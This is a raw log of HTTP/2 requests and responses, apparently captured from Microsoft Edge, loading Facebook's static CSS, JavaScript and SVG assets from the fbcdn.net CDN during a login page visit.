content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 13 Sep 2024 00:58:20 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: Atyjv9UeMp2XhAS/txWQLg==
x-fb-debug: SvemrILUXyIFVPy+vR8PPkJ8WPJlYlQlgzb+unzhSvV7k12gKc9pkoBOD95U1zqCVyHiQuZFLI1WaF1AzqjB/A==
content-length: 1402
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/9S8tw-NLOwI.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/y9/l/0,cross/9S8tw-NLOwI.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 15 Sep 2024 15:48:59 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 7YrWcbg/7uq0ohuh3i5i4A==
x-fb-debug: FbME7R6lSmFnBI05q2FShTPrPVI5Rt83sLGFPaZgREm47+GD5WQF2F5mWqoXcD3cb6dPK6Lbtekak0Ng8QV84g==
content-length: 1148
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/bIbKORaTR8F.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yH/l/0,cross/bIbKORaTR8F.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 08 Sep 2024 18:03:49 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: fA9D5YjmDa9sJQ3onDv6YQ==
x-fb-debug: 1zgsCReJKNl5+r/rMj12KLAHSeZGTj0NHdCg1UMU3LjzCl9N0iOf7VZpP0h0W2P8BQ+8rDDllB8Zp6b55lhRUA==
content-length: 320
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/kuYDQivR59P.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yS/l/0,cross/kuYDQivR59P.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:12:43 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 0FZgKBqsNSm4Gk+OFZDfPw==
x-fb-debug: VFrUhr8xxNyvGEbmU8V/UKTKpleRoVcAJSwte0ipcQE9F+T5jN0aW8QM5B9ceWW1cmogLbp5VzrByCTEQn+RyQ==
content-length: 1782
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yI/l/0,cross/N3CLkSu0qgr.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yI/l/0,cross/N3CLkSu0qgr.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 08 Sep 2024 18:03:49 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: I4HmGw8q7Du5OMT9cbxMyA==
x-fb-debug: CJWWtnQRThbPuLzkS73qciQ1fR8UyXY17Z3SNUVP7V9HnKX2ocueO+og8TJ8x6doyPemOeotRc5hYL+twVvoHg==
content-length: 577
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/OgJlGIFQEJK.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yN/l/0,cross/OgJlGIFQEJK.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:24:26 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: vfGT/coQbOf4n7m8lFRuJA==
x-fb-debug: hzP1OAyfcbG0jOBoEidjnjy1iGjU1wriVOxkCS8tMdX3Zlw3Jyc9+tmd8nKZfYLFc9OJtnXgF7eD07D8UPKHiw==
content-length: 4276
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0,cross/foC4gVUEQiA.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yB/l/0,cross/foC4gVUEQiA.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 05 Sep 2024 01:55:06 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: HHkbrKEKB+iZ56hkCGVcmA==
x-fb-debug: LHNdG+ep4o5S2FAajPO8CRvU3jLw8azGNRGr2LV3qdZPnmsQ935p19XUpM3zK+Yxnkhvd9QDvSdlY0Jem4PC/A==
content-length: 816
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/pOrYOEqdvUC.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yE/l/0,cross/pOrYOEqdvUC.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 05 Sep 2024 07:10:10 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: Nvg1ecFWA6xHskDd841InQ==
x-fb-debug: 8XTMYECuR3MK1kwSGIP8hE2Vc6bkd3Pv99bsMzwdxiu7i3Dkyf61M/ZCOlJL/ccnzWT/fhMwzGy2vX+fznO/vg==
content-length: 489
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:25:03 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: /YCzDQ6AOa06pyARfjQG1w==
x-fb-debug: iqAlTZRHv3GTDXrXd77FdX8aDminy6IaVhRuBN7c7/Yawf4da7koTgCAjKdoUmGtXES6gJLugK0wtm6fMMhxEw==
content-length: 4165
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/_bzWjvAFjKO.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yV/l/0,cross/_bzWjvAFjKO.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: image/svg+xml
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 05 Sep 2024 08:15:16 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: NiMA5zHIsmaYxSYEaw9fHg==
x-fb-debug: 1Y9zh/kz8OcYM5ukKB+5aGVScoqi0CsMADRpre6eCkxsOflMCREFbxFoCjsqCHHF2nG4BtIXeDHKzh8xX5XkHg==
content-length: 1027
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yy/r/qQ223CD1LSq.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yy/r/qQ223CD1LSq.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.facebook.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:16:48 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: CjssTkiaFVMShU0CBZvqmg==
x-fb-debug: pCDRfOGiGLP1C8pHXIaH2uWF0JhfgTWSIrUtaoNa9nxE10r5wgEHrCGm5OtO61XotAAXRVX89MMgVz3E9zULnA==
content-length: 7304
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/y8/r/dF5SId3UHWd.svg HTTP/2.0
host: static.xx.fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: br
content-type: application/x-javascript; charset=utf-8
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 15 Sep 2024 04:50:23 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: cryyPCvMBloUPQBuH0ULzA==
x-fb-debug: JJXGGWTaaXx6B/1aGAWf/fU+0eocmq2XOpdnnZmKlH75tbKccPt09n+L+vgBhbQet9RU4rDVLH6CLPhJqdiDHA==
content-length: 97761
date: Mon, 18 Sep 2023 01:48:06 GMT
access-control-allow-origin: https://www.facebook.com
vary: Origin
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/-s5MVAFOSXl.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/y4/r/-s5MVAFOSXl.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Tue, 10 Sep 2024 18:51:16 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: GsOdTcB0vU243Awkum1tJA==
x-fb-debug: ueZgv7L0MnoCkIKLnnxldPNn2UprhxJvBN4/a6pq6YrKQ9w1mCrTtzBDfM4NYYCgOTUcFaM1aGR9sLqKU2POxQ==
content-length: 7147
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/hIiX9VG_sU5.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yG/r/hIiX9VG_sU5.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 11 Sep 2024 22:41:08 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: N7d0qlCik3F8Smia/8TzIQ==
x-fb-debug: GV3qMQiJfpFCQoFEwdQpvMenMqn5Bhmdc+eacdQ8VTZQCZD3dORqPVOHm13ss+X1AdsixU9NUUUFDrtTVJkiUA==
content-length: 2520
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yZ/l/en_US/vabzdxqQxIf.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3i7M54/yZ/l/en_US/vabzdxqQxIf.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 14 Sep 2024 18:36:55 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: jN/SNR3gMcg3PfITVfoy4A==
x-fb-debug: JiIGaA2TARE47Ex/lU3L+ezoT6zymt8wtsS12j79wyEs1Z8TGy3Dh33RWzDFUG4aGV190qLQ3KFewMI60nBQ0w==
content-length: 16818
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 13 Sep 2024 17:46:10 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: 8ndYwl3CZ0NTcsbY5+0Flw==
x-fb-debug: T+Emb99W5RIdg9KMnTZW5qb8rPKlH+H12qYTRuTW0gR+DiywqIbImU3HCpp+5Bd/Md7Q05cuKUXQaDUMDuc3ww==
content-length: 554
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/gRKodhy4gQ6.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yf/r/gRKodhy4gQ6.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 13 Sep 2024 14:27:25 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: IoLOrlB2RXWtC2SAdLnU8g==
x-fb-debug: c1lB0bbf0/R+4T4Pb9vy088VrrlhQzq5ciitWrmLkYUduKMOd7vhdKdICtJqAlz/Nw5z0lMVEdTqgiS92Tbmzw==
content-length: 8616
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/IfGi7h9oJYC.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yV/r/IfGi7h9oJYC.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 13 Sep 2024 18:09:22 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: Ck31avznSpLC9Yrex5qp7w==
x-fb-debug: n2YXtZ4IMfs/mVYJRn/vwMxyvgnJYAP9Cy9d8gtNzN9gcurobop9CvW072g1E/D9tfNYvUxBxGp77MiwBaz84g==
content-length: 3239
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/q0FRCvT5NF9.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yH/l/0,cross/q0FRCvT5NF9.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:16:48 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: 3prlReKTFz1WCJ6OBYaHPg==
x-fb-debug: Y0vArtqLry25SDtwMT8OkMK7wrpTKTy80kw0t3wKW4htCQ3tTTNpD3bVot/GPCs7fTr47k9sQPs/lcVvwO0HQg==
content-length: 3733
date: Mon, 18 Sep 2023 01:48:06 GMT
